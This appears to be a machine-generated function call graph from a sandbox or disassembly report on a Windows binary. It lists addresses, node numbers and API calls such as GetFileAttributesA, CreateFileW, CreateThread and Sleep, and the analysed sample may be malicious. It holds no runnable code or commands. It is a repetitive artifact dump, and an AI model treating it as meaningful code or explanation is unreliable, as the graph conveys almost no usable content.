35206->35336 35209 40e7fe 35207->35209 35211 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35209->35211 35210 40eb45 GetFileAttributesA 35217 40eb62 35210->35217 35213 40e813 35211->35213 35214 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35213->35214 35215 40e82b 35214->35215 35216 405c10 5 API calls 35215->35216 35218 40e832 35216->35218 35220 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35217->35220 35219 408580 2 API calls 35218->35219 35219->35224 35221 40ed60 35220->35221 35222 405c10 5 API calls 35221->35222 35223 40ed68 35222->35223 35225 4183c0 2 API calls 35223->35225 35224->35190 35229 40ea8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35224->35229 35226 40ed7d 35225->35226 35227 418220 2 API calls 35226->35227 35228 40ed8c GetFileAttributesA 35227->35228 35233 40eda9 35228->35233 35231 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35231->35233 35232 40f699 Concurrency::details::ResourceManager::Release 35233->35231 35233->35232 35234 40f6cb 35233->35234 35235 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35234->35235 35236 40f6d0 35235->35236 35237 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35236->35237 35238 40f727 35237->35238 35239 405c10 5 API calls 35238->35239 35240 40f72e 35239->35240 35241 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35240->35241 35242 40f741 35241->35242 35243 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35242->35243 35244 40f756 35243->35244 35245 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35244->35245 35246 40f76b 35245->35246 35247 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35246->35247 35248 40f77d 35247->35248 35344 40e530 35248->35344 35250 40f786 35251 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35250->35251 35252 40f7aa 35251->35252 35253 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35252->35253 35254 40f7ba 35253->35254 35255 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35254->35255 35256 40f7d7 35255->35256 35257 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35256->35257 35259 40f7f0 35257->35259 35258 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35259->35258 35260 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35259->35260 35261 40f9b0 35260->35261 35262 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35261->35262 35263 40fa04 35262->35263 35264 405c10 5 API calls 35263->35264 35265 40fa0b 35264->35265 35266 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35265->35266 35267 40fa1e 35266->35267 35268 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35267->35268 35269 40fa33 35268->35269 35270 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35269->35270 35271 40fa48 35270->35271 35272 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35271->35272 35273 40fa5a 35272->35273 35274 40e530 14 API calls 35273->35274 35276 40fa63 35274->35276 35275 40fb35 Concurrency::details::ResourceManager::Release 35276->35275 35277 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35276->35277 35278 40fb54 35277->35278 35279 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35278->35279 35280 40fba5 35279->35280 35498 409580 5 API calls 3 library calls 35280->35498 35282 40fbb4 35499 409230 5 API calls 3 library calls 35282->35499 35284 40fbc3 35500 418320 35284->35500 35286 40fbdb 35286->35286 35287 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35286->35287 35288 40fc8c 35287->35288 35289 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35288->35289 35290 40fca7 35289->35290 35291 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35290->35291 35292 40fcb9 35291->35292 35504 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35292->35504 35294 40fcc2 35505 436729 35294->35505 35297 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35298 4105d4 35297->35298 35299 405c10 5 API calls 35298->35299 35300 4105db 35299->35300 35301 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35300->35301 35302 4105f1 35301->35302 35303 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35302->35303 35304 410609 35303->35304 35305 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35304->35305 35306 410621 35305->35306 35307 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35306->35307 35308 410633 35307->35308 35309 40e530 14 API calls 35308->35309 35311 41063c 35309->35311 35310 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35311->35310 35312 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35311->35312 35313 4108d3 35312->35313 35314 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35313->35314 35315 410987 35314->35315 35316 405c10 5 API calls 35315->35316 35317 41098e 35316->35317 35318 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35317->35318 35319 4109a4 35318->35319 35320 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35319->35320 35321 4109bc 35320->35321 35322 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35321->35322 35323 4109d4 35322->35323 35324 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35323->35324 35325 4112e0 35324->35325 35326 40e530 14 API calls 35325->35326 35327 4112e9 35326->35327 35508 417760 35328->35508 35330 418439 35331 418454 __InternalCxxFrameHandler 35330->35331 35522 418f40 35330->35522 35333 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35331->35333 35335 4184a8 __InternalCxxFrameHandler 35331->35335 35334 4184ee 35333->35334 35334->35206 35335->35206 35337 418292 35336->35337 35338 418248 35336->35338 35342 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35337->35342 35343 4182a1 __InternalCxxFrameHandler 35337->35343 35338->35337 35339 418251 35338->35339 35340 419280 2 API calls 35339->35340 35341 41825a 35340->35341 35341->35210 35342->35343 35343->35210 35345 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35344->35345 35346 40e576 35345->35346 35347 405c10 5 API calls 35346->35347 35348 40e581 35347->35348 35349 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35348->35349 35350 40e59c 35349->35350 35351 405c10 5 API calls 35350->35351 35352 40e5a7 35351->35352 35353 419280 2 API calls 35352->35353 35354 40e5ba 35353->35354 35355 418320 2 API calls 35354->35355 35356 40e5fc 35355->35356 35357 418220 2 API calls 35356->35357 35358 40e60d 35357->35358 35359 418320 2 API calls 35358->35359 35360 40e61e 35359->35360 35361 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35360->35361 35362 40e7cb 35361->35362 35363 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35362->35363 35364 40e7e0 35363->35364 35365 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35364->35365 35366 40e7f2 35365->35366 35367 40be30 12 API calls 35366->35367 35368 40e7fe 35367->35368 35369 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35368->35369 35370 40e813 35369->35370 35371 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35370->35371 35372 40e82b 35371->35372 35373 405c10 5 API calls 35372->35373 35374 40e832 35373->35374 35375 408580 2 API calls 35374->35375 35376 40e83e 35375->35376 35377 40ea8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35376->35377 35378 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35376->35378 35377->35250 35379 40eabd 35378->35379 35380 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35379->35380 35381 40eac2 35380->35381 35382 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35381->35382 35383 40eb19 35382->35383 35384 405c10 5 API calls 35383->35384 35385 40eb21 35384->35385 35386 4183c0 2 API calls 35385->35386 35387 40eb36 35386->35387 35388 418220 2 API calls 35387->35388 35389 40eb45 GetFileAttributesA 35388->35389 35391 40eb62 35389->35391 35392 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35391->35392 35393 40ed60 35392->35393 35394 405c10 5 API calls 35393->35394 35395 40ed68 35394->35395 35396 4183c0 2 API calls 35395->35396 35397 40ed7d 35396->35397 35398 418220 2 API calls 35397->35398 35399 40ed8c GetFileAttributesA 35398->35399 35403 40eda9 35399->35403 35401 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35401->35403 35402 40f699 Concurrency::details::ResourceManager::Release 35402->35250 35403->35401 35403->35402 35404 40f6cb 35403->35404 35405 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35404->35405 35406 40f6d0 35405->35406 35407 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35406->35407 35408 40f727 35407->35408 35409 405c10 5 API calls 35408->35409 35410 40f72e 35409->35410 35411 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35410->35411 35412 40f741 35411->35412 35413 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35412->35413 35414 40f756 35413->35414 35415 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35414->35415 35416 40f76b 35415->35416 35417 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35416->35417 35418 40f77d 35417->35418 35419 40e530 12 API calls 35418->35419 35420 40f786 35419->35420 35421 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35420->35421 35422 40f7aa 35421->35422 35423 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35422->35423 35424 40f7ba 35423->35424 35425 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35424->35425 35426 40f7d7 35425->35426 35427 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35426->35427 35429 40f7f0 35427->35429 35428 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35428->35250 35429->35428 35430 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35429->35430 35431 40f9b0 35430->35431 35432 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35431->35432 35433 40fa04 35432->35433 35434 405c10 5 API calls 35433->35434 35435 40fa0b 35434->35435 35436 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35435->35436 35437 40fa1e 35436->35437 35438 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35437->35438 35439 40fa33 35438->35439 35440 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35439->35440 35441 40fa48 35440->35441 35442 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35441->35442 35443 40fa5a 35442->35443 35444 40e530 12 API calls 35443->35444 35446 40fa63 35444->35446 35445 40fb35 Concurrency::details::ResourceManager::Release 35445->35250 35446->35445 35447 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35446->35447 35448 40fb54 35447->35448 35449 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35448->35449 35450 40fba5 35449->35450 35541 409580 5 API calls 3 library calls 35450->35541 35452 40fbb4 35542 409230 5 API calls 3 library calls 35452->35542 35454 40fbc3 35455 418320 2 API calls 35454->35455 35456 40fbdb 35455->35456 35456->35456 35457 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35456->35457 35458 40fc8c 35457->35458 35459 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35458->35459 35460 40fca7 35459->35460 35461 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35460->35461 35462 40fcb9 35461->35462 35543 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35462->35543 35464 40fcc2 35465 436729 RtlAllocateHeap 35464->35465 35466 40fce1 35465->35466 35467 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35466->35467 35468 4105d4 35467->35468 35469 405c10 5 API calls 35468->35469 35470 4105db 35469->35470 35471 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35470->35471 35472 4105f1 35471->35472 35473 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35472->35473 35474 410609 35473->35474 35475 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35474->35475 35476 410621 35475->35476 35477 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35476->35477 35478 410633 35477->35478 35479 40e530 12 API calls 35478->35479 35481 41063c 35479->35481 35480 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35480->35250 35481->35480 35482 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35481->35482 35483 4108d3 35482->35483 35484 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35483->35484 35485 410987 35484->35485 35486 405c10 5 API calls 35485->35486 35487 41098e 35486->35487 35488 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35487->35488 35489 4109a4 35488->35489 35490 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35489->35490 35491 4109bc 35490->35491 35492 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35491->35492 35493 4109d4 35492->35493 35494 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35493->35494 35495 4112e0 35494->35495 35496 40e530 12 API calls 35495->35496 35497 4112e9 35496->35497 35498->35282 35499->35284 35501 418339 35500->35501 35502 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35501->35502 35503 41834d __InternalCxxFrameHandler 35501->35503 35502->35503 35503->35286 35504->35294 35544 436672 35505->35544 35507 40fce1 35507->35297 35510 41777b 35508->35510 35521 417864 Concurrency::details::ResourceManager::Release std::_Rethrow_future_exception 35508->35521 35509 4178f1 35537 419270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 35509->35537 35510->35509 35513 417811 35510->35513 35514 4177ea 35510->35514 35520 4177fb std::_Rethrow_future_exception 35510->35520 35510->35521 35512 4178f6 35538 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 35512->35538 35518 41d3e2 ListArray 2 API calls 35513->35518 35513->35520 35514->35512 35517 41d3e2 ListArray 2 API calls 35514->35517 35516 4178fb 35517->35520 35518->35520 35519 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35519->35509 35520->35519 35520->35521 35521->35330 35523 418f6b 35522->35523 35524 41908e 35522->35524 35527 418fb2 35523->35527 35528 418fdc 35523->35528 35539 419270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 35524->35539 35526 419093 35540 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 35526->35540 35527->35526 35530 418fbd 35527->35530 35533 41d3e2 ListArray 2 API calls 35528->35533 35535 418fc3 std::_Rethrow_future_exception 35528->35535 35532 41d3e2 ListArray 2 API calls 35530->35532 35531 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35534 41909d 35531->35534 35532->35535 35533->35535 35535->35531 35536 41904c Concurrency::details::ResourceManager::Release std::_Rethrow_future_exception 35535->35536 35536->35331 35538->35516 35540->35535 35541->35452 35542->35454 35543->35464 35547 43667e ___scrt_is_nonwritable_in_current_image 35544->35547 35545 436685 35546 4375f6 __dosmaperr RtlAllocateHeap 35545->35546 35548 43668a 35546->35548 35547->35545 35549 4366a5 35547->35549 35562 436c5a RtlAllocateHeap ___std_exception_copy 35548->35562 35551 4366b7 35549->35551 35552 4366aa 35549->35552 35558 43a8c3 35551->35558 35553 4375f6 __dosmaperr RtlAllocateHeap 35552->35553 35557 436695 35553->35557 35555 4366c0 35556 4375f6 __dosmaperr RtlAllocateHeap 35555->35556 35555->35557 35556->35557 35557->35507 35559 43a8cf ___scrt_is_nonwritable_in_current_image _unexpected 35558->35559 35563 43a967 35559->35563 35561 43a8ea 35561->35555 35562->35557 35564 43a98a ___scrt_uninitialize_crt 35563->35564 35565 43d82f _unexpected RtlAllocateHeap 35564->35565 35568 43a9d0 ___scrt_uninitialize_crt __wsopen_s 35564->35568 35566 43a9eb 35565->35566 35569 43adf5 RtlAllocateHeap __dosmaperr 35566->35569 35568->35561 35569->35568 35570 40eb4e 35571 40eb50 GetFileAttributesA 35570->35571 35572 40eb62 35571->35572 35573 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35572->35573 35574 40ed60 35573->35574 35575 405c10 5 API calls 35574->35575 35576 40ed68 35575->35576 35577 4183c0 2 API calls 35576->35577 35578 40ed7d 35577->35578 35579 418220 2 API calls 35578->35579 35580 40ed8c GetFileAttributesA 35579->35580 35584 40eda9 35580->35584 35582 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35582->35584 35583 40f699 Concurrency::details::ResourceManager::Release 35584->35582 35584->35583 35585 40f6cb 35584->35585 35586 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35585->35586 35587 40f6d0 35586->35587 35588 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35587->35588 35589 40f727 35588->35589 35590 405c10 5 API calls 35589->35590 35591 40f72e 35590->35591 35592 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35591->35592 35593 40f741 35592->35593 35594 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35593->35594 35595 40f756 35594->35595 35596 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35595->35596 35597 40f76b 35596->35597 35598 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35597->35598 35599 40f77d 35598->35599 35600 40e530 14 API calls 35599->35600 35601 40f786 35600->35601 35602 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35601->35602 35603 40f7aa 35602->35603 35604 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35603->35604 35605 40f7ba 35604->35605 35606 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35605->35606 35607 40f7d7 35606->35607 35608 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35607->35608 35610 40f7f0 35608->35610 35609 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35610->35609 35611 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35610->35611 35612 40f9b0 35611->35612 35613 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35612->35613 35614 40fa04 35613->35614 35615 405c10 5 API calls 35614->35615 35616 40fa0b 35615->35616 35617 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35616->35617 35618 40fa1e 35617->35618 35619 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35618->35619 35620 40fa33 35619->35620 35621 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35620->35621 35622 40fa48 35621->35622 35623 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35622->35623 35624 40fa5a 35623->35624 35625 40e530 14 API calls 35624->35625 35627 40fa63 35625->35627 35626 40fb35 Concurrency::details::ResourceManager::Release 35627->35626 35628 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35627->35628 35629 40fb54 35628->35629 35630 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35629->35630 35631 40fba5 35630->35631 35679 409580 5 API calls 3 library calls 35631->35679 35633 40fbb4 35680 409230 5 API calls 3 library calls 35633->35680 35635 40fbc3 35636 418320 2 API calls 35635->35636 35637 40fbdb 35636->35637 35637->35637 35638 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35637->35638 35639 40fc8c 35638->35639 35640 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35639->35640 35641 40fca7 35640->35641 35642 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35641->35642 35643 40fcb9 35642->35643 35681 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35643->35681 35645 40fcc2 35646 436729 RtlAllocateHeap 35645->35646 35647 40fce1 35646->35647 35648 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35647->35648 35649 4105d4 35648->35649 35650 405c10 5 API calls 35649->35650 35651 4105db 35650->35651 35652 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35651->35652 35653 4105f1 35652->35653 35654 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35653->35654 35655 410609 35654->35655 35656 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35655->35656 35657 410621 35656->35657 35658 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35657->35658 35659 410633 35658->35659 35660 40e530 14 API calls 35659->35660 35662 41063c 35660->35662 35661 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35662->35661 35663 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35662->35663 35664 4108d3 35663->35664 35665 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35664->35665 35666 410987 35665->35666 35667 405c10 5 API calls 35666->35667 35668 41098e 35667->35668 35669 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35668->35669 35670 4109a4 35669->35670 35671 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35670->35671 35672 4109bc 35671->35672 35673 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35672->35673 35674 4109d4 35673->35674 35675 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35674->35675 35676 4112e0 35675->35676 35677 40e530 14 API calls 35676->35677 35678 4112e9 35677->35678 35679->35633 35680->35635 35681->35645 35696 43ac53 35701 43aa29 35696->35701 35699 43ac92 35702 43aa48 35701->35702 35703 43aa5b 35702->35703 35711 43aa70 35702->35711 35704 4375f6 __dosmaperr RtlAllocateHeap 35703->35704 35705 43aa60 35704->35705 35721 436c5a RtlAllocateHeap ___std_exception_copy 35705->35721 35707 43aa6b 35707->35699 35718 441a9c 35707->35718 35708 4375f6 __dosmaperr RtlAllocateHeap 35709 43ac41 35708->35709 35725 436c5a RtlAllocateHeap ___std_exception_copy 35709->35725 35716 43ab90 35711->35716 35722 44132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35711->35722 35713 43abe0 35713->35716 35723 44132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35713->35723 35715 43abfe 35715->35716 35724 44132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35715->35724 35716->35707 35716->35708 35726 441461 35718->35726 35720 441ab7 35720->35699 35721->35707 35722->35713 35723->35715 35724->35716 35725->35707 35729 44146d ___scrt_is_nonwritable_in_current_image 35726->35729 35727 441474 35728 4375f6 __dosmaperr RtlAllocateHeap 35727->35728 35730 441479 35728->35730 35729->35727 35731 44149f 35729->35731 35744 436c5a RtlAllocateHeap ___std_exception_copy 35730->35744 35735 441a2e 35731->35735 35734 441483 __wsopen_s 35734->35720 35745 43698d 35735->35745 35737 441a50 35748 4368ed 35737->35748 35740 441a64 35742 441a96 35740->35742 35792 43adf5 RtlAllocateHeap __dosmaperr 35740->35792 35742->35734 35744->35734 35746 43690a __fassign 3 API calls 35745->35746 35747 43699f __wsopen_s 35746->35747 35747->35737 35793 43683b 35748->35793 35751 441abc 35752 441ad9 35751->35752 35753 441b07 35752->35753 35754 441aee 35752->35754 35810 43bf3a 35753->35810 35815 4375e3 RtlAllocateHeap __dosmaperr 35754->35815 35757 441af3 35761 4375f6 __dosmaperr RtlAllocateHeap 35757->35761 35758 441b0c 35759 441b15 35758->35759 35760 441b2c 35758->35760 35816 4375e3 RtlAllocateHeap __dosmaperr 35759->35816 35814 441775 CreateFileW 35760->35814 35788 441b00 35761->35788 35764 441b1a 35766 4375f6 __dosmaperr RtlAllocateHeap 35764->35766 35765 441be2 GetFileType 35768 441c34 35765->35768 35769 441bed 35765->35769 35766->35757 35767 441bb7 35818 4375c0 RtlAllocateHeap __dosmaperr 35767->35818 35820 43be85 RtlAllocateHeap __dosmaperr __wsopen_s 35768->35820 35819 4375c0 RtlAllocateHeap __dosmaperr 35769->35819 35770 441b65 35770->35765 35770->35767 35817 441775 CreateFileW 35770->35817 35772 441baa 35772->35765 35772->35767 35776 441c55 35778 441ca1 35776->35778 35821 441984 4 API calls 2 library calls 35776->35821 35777 441bfb 35777->35757 35782 4375f6 __dosmaperr RtlAllocateHeap 35777->35782 35783 441ca8 35778->35783 35823 441522 4 API calls 3 library calls 35778->35823 35781 441cd6 35781->35783 35785 441ce4 35781->35785 35782->35757 35822 43af48 RtlAllocateHeap __dosmaperr __wsopen_s 35783->35822 35785->35788 35824 441775 CreateFileW 35785->35824 35787 441d8b 35787->35788 35825 4375c0 RtlAllocateHeap __dosmaperr 35787->35825 35788->35740 35790 441da1 35826 43c04d RtlAllocateHeap __dosmaperr __wsopen_s 35790->35826 35792->35742 35794 436863 35793->35794 35795 436849 35793->35795 35797 43686a 35794->35797 35799 436889 __fassign 35794->35799 35806 4369cc RtlAllocateHeap __freea 35795->35806 35800 436853 35797->35800 35807 4369e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 35797->35807 35802 43689f __fassign 35799->35802 35809 4369e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 35799->35809 35800->35740 35800->35751 35802->35800 35808 4375c0 RtlAllocateHeap __dosmaperr 35802->35808 35804 4368ab 35805 4375f6 __dosmaperr RtlAllocateHeap 35804->35805 35805->35800 35806->35800 35807->35800 35808->35804 35809->35802 35813 43bf46 ___scrt_is_nonwritable_in_current_image _unexpected 35810->35813 35811 43bd14 __wsopen_s RtlAllocateHeap 35812 43bf77 __wsopen_s 35811->35812 35812->35758 35813->35811 35813->35812 35814->35770 35815->35757 35816->35764 35817->35772 35818->35757 35819->35777 35820->35776 35821->35778 35822->35788 35823->35781 35824->35787 35825->35790 35826->35788 35827 407590 Sleep 35828 40765e 35827->35828 35829 4075e3 35827->35829 35830 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35828->35830 35845 41d111 SleepConditionVariableCS 35829->35845 35832 40767a 35830->35832 35834 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35832->35834 35833 4075ed 35833->35828 35846 41d64e RtlAllocateHeap RtlAllocateHeap 35833->35846 35836 407693 35834->35836 35838 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35836->35838 35837 407654 35847 41d0c7 RtlWakeAllConditionVariable 35837->35847 35840 4076ac CreateThread Sleep 35838->35840 35841 4076d9 Concurrency::details::ResourceManager::Release 35840->35841 35848 407430 35840->35848 35842 40777f Concurrency::details::ResourceManager::Release 35841->35842 35843 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35841->35843 35844 4077a0 35843->35844 35845->35833 35846->35837 35847->35828 35849 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35848->35849 35850 407465 35849->35850 35851 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35850->35851 35852 407478 35851->35852 35853 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35852->35853 35854 407488 35853->35854 35855 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35854->35855 35856 40749d 35855->35856 35857 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35856->35857 35858 4074b2 35857->35858 35859 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35858->35859 35860 4074c4 